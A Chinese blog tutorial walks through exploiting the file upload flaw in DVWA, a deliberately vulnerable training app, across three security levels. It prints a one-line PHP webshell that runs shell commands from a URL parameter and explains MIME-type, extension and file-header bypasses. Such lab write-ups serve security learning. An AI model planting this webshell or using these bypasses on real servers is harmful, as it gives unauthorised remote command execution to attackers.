Kali渗透测试(七)—— DVWA文件上传漏洞利用

最新推荐文章于 2024-06-15 22:07:41 发布
最新推荐文章于 2024-06-15 22:07:41 发布
阅读量2.1k 收藏 19
点赞数 2
分类专栏: 安全 kali 文章标签: 安全 kali 文件上传 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Bulldozer_GD/article/details/106558266
版权
安全 同时被 2 个专栏收录
29 篇文章 5 订阅
订阅专栏
kali
15 篇文章 5 订阅
订阅专栏

Kali linux渗透测试—— 文件上传

一. 简介
上传的文件对应用程序构成了重大风险。 许多攻击的第一步是向要攻击的系统获取一些代码。 然后,攻击仅需要找到一种方法来执行代码。 使用文件上传可帮助攻击者完成第一步。
无限制文件上传的后果可能会有所不同,包括完整的系统接管,文件系统过载,将攻击转发到后端系统以及简单的破坏。 这取决于应用程序如何处理上传的文件,包括文件的存储位置。

主要利用方式
1.直接上传 webshell
2.修改文件类型上传 webshell:mimetype 文件头、扩展名
3.修改扩展名上传 webshell:静态解析文件扩展名可能无法执行
4.文件头绕过过滤文件上传 webshell
5.防御措施:删除目录执行权限增加安全性

二.测试
1.测试 dvwa low 安全级别,从源代码看这个级别没有任何防护,可以上传任意文件
在这里插入图片描述
测试:上传一个简单的木马 1.php文件

<?php
	echo shell_exec($_GET['cmd']);
?>

在这里插入图片描述
上传成功,到这个目录下执行任意命令即可如pwd
http://192.168.10.136/dvwa/hackable/uploads/1.php?cmd=pwd
命令执行成功
在这里插入图片描述2.测试dvwa medium 级别,可以看到对文件类型和大小做了限制
在这里插入图片描述
启用Burpsuite修改文件类型为image/jpeg即可
在这里插入图片描述
ok上传成功
在这里插入图片描述3.high 级别,按照文件真实扩展名判断,也可以绕过
在这里插入图片描述
修改文件名和类型
在这里插入图片描述

测试一下,ok
192.168.10.136/dvwa/hackable/uploads/1.php.jpg?cmd=ls在这里插入图片描述
还有种方式,先随便上传一个图片抓包截断修改内容如下,防止系统对文件头做检验
在这里插入图片描述
测试一下,也ok吼吼吼吼吼
在这里插入图片描述

在这里插入图片描述

Bulldozer++
关注
  • 2
    点赞
  • 19
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
渗透测试笔记】四、文件上传漏洞
【User Not Found】的博客
04-22 657
We are all in the gutter, but some of us are looking at the stars. 身在井隅,心向璀璨。 本文仅供学习交流,正确使用渗透测试,遵守相关法律法规,请勿用于非法用途。 目录关于漏洞实验环境漏洞预防策略挖掘漏洞使用weevely生成php后门提高难度为Medium提高难度为Hign相关难度源码LowMediunHign 关于漏洞 文件...
DVWA——File Upload
qq_54448882的博客
11-09 2975
此文章仅供学习使用,请勿用作违法行为。 目录 简介 文件上传漏洞 Webshell(网页后门) 造成文件上传漏洞的主要原因 危害 Low 上传一句话木马 使用蚁剑连接 Medium 上传一句话木马 拦截信息改变上传文件类型 蚁剑连接 简介: 文件上传漏洞: 文件上传漏洞主要攻击web服务,有文件上传存在的地方都有可能存在文件上传的漏洞,但并不是所有地方都存在这个漏洞。漏洞是否存在取决于对方的代码的完整性,若某些验证代码存在疏忽,就很可能造成文件上传漏洞。例...
DVWA环境实战演示“文件上传”漏洞
qq_40529133的博客
04-03 1086
文件上传漏洞 概念 文件上传漏洞的产生是因为Web应用程序没有对上传文件的格式进行严格过滤;攻击者可以上传病毒,恶意脚本,webshall等严重威胁服务器安全的文件,如果服务器的处理逻辑做的不够安全的话,将会导致严重后果。 准备实战环境 进入DVWA界面,把安全等级调成 “low” 找到我们的 File upload 模块 看起来像一个正常的界面,我们先随便找张图片试一下: 把这张很萌的史迪仔...
【靶场搭建】-01- 在kali上搭建DVWA靶机
最新发布
Zane的博客
06-15 700
搭建DVWA靶机
[网络安全]DVWA之File Upload—AntSword(蚁剑)攻击姿势及解题详析合集
等风来
04-29 1万+
由于jpg是不被解析的,所以需要抓包将文件格式修改为php等。如下图,将filename="qiu.jpg"修改为filename="qiu.php"将路径与URL拼接,连接蚁剑。
Kali渗透测试DVWA系列10——File Upload(文件上传)
浅浅的博客
06-14 5739
一、File Upload(文件上传) 1、文件上传原理 File Upload,即文件上传漏洞。通常是由于对上传文件的类型、内容没有进行严格的过滤、检查,使得攻击者可以通过上传木马获取服务器的webshell权限,因此文件上传漏洞带来的危害常常是毁灭性的。简单点说,就是用户直接或者通过各种绕过方式将 webshell 上传到服务器中进而执行利用。 2、文件上传漏洞前提条件...
DVWA-文件上传全等级绕过(一句话木马+中国菜刀+蚁剑)
热门推荐
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
12-13 1万+
DVWA文件上传前言一、low级别1.1 一句话木马1.2 中国菜刀使用1.3 蚁剑二、Medium级别三、High级别四、Impossible级别 前言     文件上传漏洞是对于上传文件的类型内容没有进行严格的过滤检查,使得攻击者可以通过上传一些木马获取服务器的webshell,因此文件上传漏洞带来的危害通常都是致命的。 一、low级别 打开dvwa,File Upload     会看到有红色报错,具体解决办法请参考我的
DVWA——文件上传
m0_74426634的博客
04-07 1036
大部分的网站和应用系统都有上传功能,一些文件上传功能实现代码没有严格限制用户上传的文件后缀以及文件类型,导致允许攻击者向某个可通过Web访问的目录上传任意PHP文件,并能够将这些文件传递给PHP解释器,就可以在远程服务器上执行任意PHP脚本。当系统存在文件上传漏洞时攻击者可以将病毒、木马、WebShell、其他恶意脚本或者是包含了脚本的图片上传到服务器,这些文件将对攻击者后续攻击提供便利。根据具体漏洞的差异,此处上传的脚本可以是正常后缀的PHP、ASP以及JSP脚本,也可以是篡改后缀后的这几类脚本。
kali2021.3安装dvwa靶场
02-24
接着,通过文件传输工具将该文件夹上传到Kali虚拟机的/home/kali/Desktop目录下。 在Kali虚拟机内部,需要进行一系列的步骤来配置和启动DVWA。首先切换到桌面目录,然后使用`sudo cp -r`命令复制dvwa目录到/var/...
十三、kali windows DVWA搭建及测试
01-15
Kali Windows环境下DVWA搭建与测试详解》 在网络安全领域,模拟真实环境进行渗透测试是提升技能的重要途径。 Damn Vulnerable Web Application (DVWA) 是一个由OWASP(Open Web Application Security Project)...
50-50.渗透测试-Kali Linux漏洞利用
05-10
50-50.渗透测试-Kali Linux漏洞利用
Kali渗透测试技术实战
07-24
硬盘最小120G,尤其是在密码破解、取证和做渗透测试项目的情况下,要求获得控制权限,大量生成数据、收集证据、生成日志和报告。 第三章 软件、补丁和升级 第四章 配置 kali 第五章渗透测试实验环境 第六章渗透测试...
kali渗透测试漏洞扫描漏洞破解
02-09
KALI渗透测试之密码破解篇章,详细介绍kali的密码破解工具使用。
从零开始的DVWA靶机攻击经历(第三天)
qq1481011684的博客
05-20 106
从零开始的DVWA靶机攻击经历(第三天) file inclusion & file upload(low难度) file inclusion 登陆到file inclusion页面,观察url(http://192.168.142.132/DVWA/vulnerabilities/fi/?page=include.php)可以发现一些有价值的信息: include.php可能在 网站根目录/DVWA/vulnerabilities/fi下,因此我们尝试一下将url改成http://192.
DVWA的upload文件上传漏洞(全难度)(小白向)
xihaxiha9的博客
04-19 2542
DVWA文件上传详解
sql注入-dvwa网站-写webshell
arissa666的博客
07-20 100
不转换就直接写成table_name=“users”就可以。用1,2,3的时候报错,1,2,不报错,说明有2个参数。0x7573657273就是users的十六进制,是5.0以上版本就可以用默认库获取所有库。0x7c是|所以结果会有分割开。把网站打开,等级设为low。获取users里面的字段。
DVWA文件上传漏洞
weixin_56306210的博客
02-13 4236
DVWA文件上传
dvwa中的文件包含攻击
无痕的博客
01-17 1837
文件包含攻击介绍与在dvwa中的演示
kaliLinux
2301_77024414的博客
07-01 987
包括文件上传漏洞、XSS漏洞以及部分后渗透内容,实验在kali和win10操作系统下进行进行,所用工具为nmap、蚁剑
实战指南:利用Kali Linux进行渗透测试
《利用Kali进行黑客攻击:实战渗透测试技术》是一本由James Broad和Andrew Bindner合著的专业书籍,它全面指导读者通过当前最先进的Live CD/USB系统Kali Linux进行渗透测试。本书旨在提供一个实用且深入的指南,帮助...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Bulldozer++

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值